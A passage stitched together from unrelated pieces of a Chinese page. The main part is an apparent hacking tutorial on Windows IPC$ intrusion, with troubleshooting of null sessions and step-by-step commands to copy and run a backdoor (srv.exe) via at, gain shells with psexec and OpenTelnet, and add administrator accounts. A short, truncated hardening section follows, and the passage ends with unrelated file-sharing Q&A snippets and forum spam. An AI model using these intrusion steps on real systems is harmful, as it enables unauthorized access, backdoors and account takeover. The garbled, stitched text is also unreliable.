5 响应方未启动 NetLogon ，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；
6 响应方的 139 ， 445 端口未处于监听状态或被防火墙屏蔽；
7 连接发起方未打开 139 ， 445 端口；
8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于 ' 无法更新密码 ' 这样的错误提示（显然空会话排除这种错误）；
9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号 "" 即可；
10 如果在已经建立好连接的情况下对方重启计算机，那么 ipc$ 连接将会自动断开，需要重新建立连接。
另外 , 你也可以根据返回的错误号分析原因：
错误号 5 ，拒绝访问：很可能你使用的用户不是管理员权限的；
错误号 51 ， Windows 无法找到网络路径：网络有问题；
错误号 53 ，找不到网络路径： ip 地址错误；目标未开机；目标 lanmanserver 服务未启动；目标有防火墙（端口过滤）；
错误号 67 ，找不到网络名：你的 lanmanworkstation 服务未启动或者目标删除了 ipc$ ；
错误号 1219 ，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个 ipc$ ，请删除再连；
错误号 1326 ，未知的用户名或错误密码：原因很明显了；
错误号 1792 ，试图登录，但是网络登录服务没有启动：目标 NetLogon 服务未启动；
错误号 2242 ，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。
八 复制文件失败的原因
有些朋友虽然成功的建立了 ipc$ 连接，但在 时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？
1 对方未开启共享文件夹
这类错误出现的最多，占到 50% 以上。许多朋友在 ipc$ 连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用 net view \\IP 这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立 ipc$ 连接就一定有共享文件夹存在。
2 向默认共享复制失败
这类错误也是大家经常犯的，主要有两个小方面：
1 ）错误的认为能建立 ipc$ 连接的主机就一定开启了默认共享，因而在建立完连接之后马上向 c$,d$,admin$ 之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。 ipc$ 连接成功只能说明对方打开了 ipc$ 共享，并不能说明默认共享一定存在。 ipc$ 共享与默认共享是 两码 事， ipc$ 共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；
2 ）由于 net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带 $ ），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）
要点：请大家一定区分 ipc 共享，默认共享，普通共享这三者的区别： ipc 共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。
3 用户权限不够，包括四种情形：
1 ）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；
2 ）向默认共享复制时，在 Win2000 Pro 版中，只有 Administrators 和 Backup Operators 组成员才可以，在 Win2000 Server 版本 Server Operatros 组也可以访问到这些共享目录；
3 ）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；
4 ）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；
注意：
1 不要认为 administrator 就一定具有管理员权限，管理员名称是可以改的
2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图 6 ，管理员为 D 盘设置的访问权限为仅允许名为 xinxin 的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然不能访问 D 盘。不过有意思的是，如果此时对方又开启了 D$ 的默认共享，那么你却可以访问 D$ ，从而绕过了权限限制，有兴趣的朋友可以自己做测试。
4 被防火墙杀死或在局域网
还有一种情况，那就是也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复制操作已经成功了，只是运行时出了问题。
呵呵，大家也知道， ipc$ 连接在实际操作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。
九 关于 at 命令和 xp 对 ipc$ 的限制
本来还想说一下用 at 远程运行程序失败的原因，但考虑到 at 的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用 psexec.exe 远程运行程序，假设想要远程机器执行本地 c:\xinxin.exe 文件，且管理员为 administrator ，密码为 1234 ，那么输入下面的命令：
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立 ipc 连接，则 -u -p 这两个参数不需要， psexec.exe 将自动拷贝文件到远程机器并运行。
本来 xp 中的 ipc$ 也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到 xp 的时候，大部分操作都很难成功。我在这里就简单提一下吧，在 xp 的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和密码，你所得到的权限也只是 Guest ，因此大部分操作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了 xp 的管理员密码，我建议你尽量避开 ipc 管道。
十 如何打开目标的 IPC$ 共享以及其他共享
目标的 ipc$ 不是轻易就能打开的，否则就要天下打乱了。你需要一个 admin 权限的 shell ，比如 telnet ，木马， cmd 重定向等，然后在 shell 下执行：
net share ipc$
开放目标的 ipc$ 共享；
net share ipc$ /del
关闭目标的 ipc$ 共享；如果你要给它开共享文件夹，你可以用：
net share xinxin=c:\
这样就把它的 c 盘开为共享名为 xinxin 共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是 net share c$ ，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些操作都是在 shell 下才能实现的。
十一 一些需要 shell 才能完成的命令
看到很多教程这方面写的十分不准确，一些需要 shell 才能完成命令就简简单单的在 ipc$ 连接下执行了，起了误导作用。那么下面我总结一下需要在 shell 才能完成的命令：
1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在 shell 下完成；
2 打开远程主机的 ipc$ 共享，默认共享，普通共享的操作需要在 shell 下完成；
3 运行 / 关闭远程主机的服务，需要在 shell 下完成；
4 启动 / 杀掉远程主机的进程，也需要在 shell 下完成（用软件的情况下除外，如 pskill ）。
十二 入侵中可能会用到的命令
为了这份教程的完整性，我列出了 ipc$ 入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的 shell （如 cmd ， telnet 等）后，才能向远程主机执行。
1 建立 / 删除 ipc$ 连接的命令
1 ）建立空连接 :
net use \\127.0.0.1\ipc$ "" /user:""
2 ）建立非空连接 :
net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
3 ）删除连接 :
net use \\127.0.0.1\ipc$ /del
2 在 ipc$ 连接中对远程主机的操作命令
1 ） 查看远程主机的共享资源（看不到默认共享） :
net view \\127.0.0.1
2 ） 查看远程主机的当前时间 :
net time \\127.0.0.1
3 ） 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 ）映射 / 删除远程共享 :
net use z: \\127.0.0.1\c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘，其他盘类推
5 ）向远程主机复制文件 :
路径 \ 文件名 \\IP\ 共享目录名，如：
c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然，你也可以把远程主机上的文件复制到自己的机器里：
\\127.0.0.1\c$\xinxin.exe c:\
6 ）远程添加计划任务 :
at \\IP 时间 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：时间尽量使用 24 小时制；如果你打算运行的程序在系统默认搜索路径（比如 system32/ ）下则不用加路径，否则必须加全路径
3 本地命令
1 ）查看本地主机的共享资源（可以看到本地的默认共享）
net share
2 ）得到本地主机的用户列表
net user
3 ）显示本地某用户的帐户信息
net user 帐户名
4 ）显示本地主机当前启动的服务
net start
5 ）启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 ）在本地添加帐户
net user 帐户名 密码 /add
7 ）激活禁用的用户
net uesr 帐户名 /active:yes
8 ）加入管理员组
net localgroup administrators 帐户名 /add
很显然的是，虽然这些都是本地命令，但如果你在远程主机的 shell 中输入，比如你 telnet 成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。
4 其他一些命令
1 ） telnet
telnet IP 端口
telnet 127.0.0.0 23
2 ）用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求：
1 ）目标开启了 ipc$ 共享
2 ）你要拥有管理员密码和帐号
3 ）目标开启 RemoteRegistry 服务，用户就可以更改 ntlm 认证
4 ）对仅 WIN2K/XP 有效
3 ）用 psexec.exe 一步获得 shell ，需要 ipc 管道支持
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的 ipc$ 入侵
既然是对比，那么我就先把过去的 ipc$ 入侵步骤写给大家，都是蛮经典的步骤：
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\ 用扫到的空口令建立连接
[2]
c:\>net view \\127.0.0.1
\\ 查看远程的共享资源
[3]
C:\> srv.exe \\127.0.0.1\admin$\system32
\\ 将一次性后门 srv.exe 复制到对方的系统文件夹下，前提是 admin$ 开启
[4]
C:\>net time \\127.0.0.1
\\ 查看远程主机的当前时间
[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\ 用 at 命令远程运行 srv.exe ，需要对方开启了 'Task Scheler' 服务
[6]
C:\>net time \\127.0.0.1
\\ 再次查看当前时间来估算 srv.exe 是否已经运行，此步可以省略
[7]
C:\>telnet 127.0.0.1 99
\\ 开一个新窗口，用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思？那你就把它想象成远程机器的控制权就好了，操作像 DOS) ， 99 端口是 srv.exe 开的一次性后门的端口
[8]
C:\WINNT\system32>net start telnet
\\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务，毕竟 srv.exe 是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的 telnet 已经启动，此步可省略
[9]
C:\> ntlm.exe \\127.0.0.1\admin$\system32
\\ 在原来那个窗口中将 ntlm.exe 传过去， ntlm.exe 是用来更改 telnet 身份验证的
[10]
C:\WINNT\system32>ntlm.exe
\\ 在 shell 窗口中运行 ntlm.exe ，以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:\>telnet 127.0.0.1 23
\\ 在新窗口中 telnet 到 127.0.0.1 ，端口 23 可省略，这样我们又获得一个长期的后门
[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\\telnet 上以后，你可以建立新帐户，激活 guest ，把任何帐户加入管理员组等
好了，写到这里我似乎回到了 2 ， 3 年前，那时的 ipc$ 大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的 ipc$ 入侵吧。
[1]
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port
\\ 用它可以方便的更改 telnet 的验证方式和端口，方便我们登陆
[2]
已经没有第二步了，用一步获得 shell 之后，你做什么都可以了，安后门可以用 winshell ，克隆就用 ca 吧，开终端用 3389.vbe ，记录密码用 win2kpass ，总之好的工具不少，随你选了，我就不多说了。
十四 如何防范 ipc$ 入侵
1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 )
运行 regedit ，找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 把 RestrictAnonymous = DWORD 的键值改为： 1
如果设置为 "1" ，一个匿名用户仍然可以连接到 IPC$ 共享，但无法通过这种连接得到列举 SAM 帐号和共享信息的权限；在 Windows 2000 中增加了 "2" ，未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1 。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－ ' 对匿名连接的额外限制 '
2 禁止默认共享
1 ）察看本地共享资源
运行 -cmd- 输入 net share
2 ）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete （如果有 e,f, ……可以继续删除）
3 ）停止 server 服务
net stop server /y （重新启动后 server 服务会重新开启）
4 ）禁止自动打开默认共享（此操作并不能关闭 ipc$ 共享）
运行 -regedit
server 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareServer （ DWORD ）的键值改为 :00000000 。
pro 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareWks （ DWORD ）的键值改为 :00000000 。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。
3 关闭 ipc$ 和默认共享依赖的服务 :server 服务
如果你真的想关闭 ipc$ 共享，那就禁止 server 服务吧：
控制面板 - 管理工具 - 服务 - 找到 server 服务（右击） - 属性 - 常规 - 启动类型 - 选已禁用，这时可能会有提示说： XXX 服务也会关闭是否继续，因为还有些次要的服务要依赖于 server 服务，不要管它。
4 屏蔽 139 ， 445 端口
由于没有以上两个端口的支持，是无法建立 ipc$ 的，因此屏蔽 139 ， 445 端口同样可以阻止 ipc$ 入侵。
1 ） 139 端口可以通过禁止 NBT 来屏蔽
本地连接－ TCP/IT 属性－高级－ WINS －选‘禁用

6. 悬赏20分，如何将C盘里的“共享文档”迁移到别的盘里面去

首先，在你想要更改到的目录下新建一个文件夹，另外，鉴于共享文件的开放性，你最好不要将其放在一个私人文件夹内。接下来的步骤便是我们很熟悉的编辑注册表。到HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Shell Folders目录下，双击名为Common Documents的子键，将其键值更改为刚才新建文件夹的路径。然后对CommonMusic，CommonPictures和CommonVideo进行同样的操作（注意，这三项子键的名称中间没有空格）。

下面来到HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\User Shell Folders目录，对Common Documents子键进行同样的操作，并新建三个分别名为CommonMusic，CommonPictures和CommonVideo的子键，并将其键值更改为新文件夹的路径，注意输入路径的正确性。

大功告成，向新建的共享文件夹中拷贝一个测试文件，注销并以另一个用户登录，现在你便能发现一个可用的新共享文件夹了。注销并登录回到原帐户，这时“我的电脑”窗口最上方的共享文件夹中便有你新建的那一个。如果希望在网络中共享文件，别忘了对文件夹启用网络共享。

找来的 不知道怎么样 你试试吧

7. 怎么把一台电脑的文件快速的拷贝到另外一台电脑上

1、将新、旧两台电脑都连接到同一个路由器下。有线和无线都可以。条件允许的话推荐插网线。网络传输相对比无线网络稳定。

8. 局域网工作组电脑显示不全

1、控制面板---"网络和共享中心"--这时可以看到“计算机--网络--interner”。
2、然后点击“网络”，如果已设置了启用网络共享发现，便会自动搜索，看到同一局域网的其他计算机。
3、如果未启用网络共享，在网络和共享中心的“更改高级共享设置”打开即可。



win7系统查不到工作组电脑操作步骤：
1、首先打开win7系统中的运行对话框，然后输入gpedit.msc，回车打开组策略；

2、依次展开计算机配置——Windows设置——安全设置——本地策略，点击安全选项找到网络安全：LAN 管理器身份验证级别；
3、双击将验证级别改为发送LM和NTLM 响应（&），确定打开控制面板——网络和共享中心，查看目前使用的网络设置的是工作网络还是公用网络如果是公用网络，点击公用网络，更改为工作网络，电脑再重新启动下就可以了。

9. 怎么修改共享文档的存放路径

桌面——我的文档——在这个上面按鼠标右键——属性——自己改动路径一将C:\Documents and Settings\我的用户名目录下的文件夹My Documents复制到D盘二右击桌面我的文档→属性→目标文件夹的路径改成D:\My Documents三这时我的文档已经指向D盘，可能我的文档中图片收藏和我的音乐下面的文件夹会有复件，删除霏凡论坛再次出精品实用绿软┊个人设置和资料转移器2.0┊19日更新！需要的请来下载最新个人设置和资料转移器2.0(霏凡专版)[19日更新,加入还原功能]本程序为绿色软件，功能和作用是方便快捷的转移一些个人资料和设置，将其转移动其它目录，避免这些东东存放在系统分区，减少对系统分区的占用，还有不让重装系统后个人资料的丢失！程序中已经有详细说明…… （鼠标指向选项就会弹出对应的项目说明）本版增加了将选项还原至系统默认设置的选项。并且已经修正了上一版本中存在的所有BUG，今天花了一整天时间对程序源代码进行了修改，重写并精简了一下代码，个人认为程序已经基本完善了。不管你之前有没有使用过其它转移工具或手动设置转移过，软件都能正确进行转移和还原设置操作……，没什么可多说的了，喜欢的就顶吧！发现问题就说吧！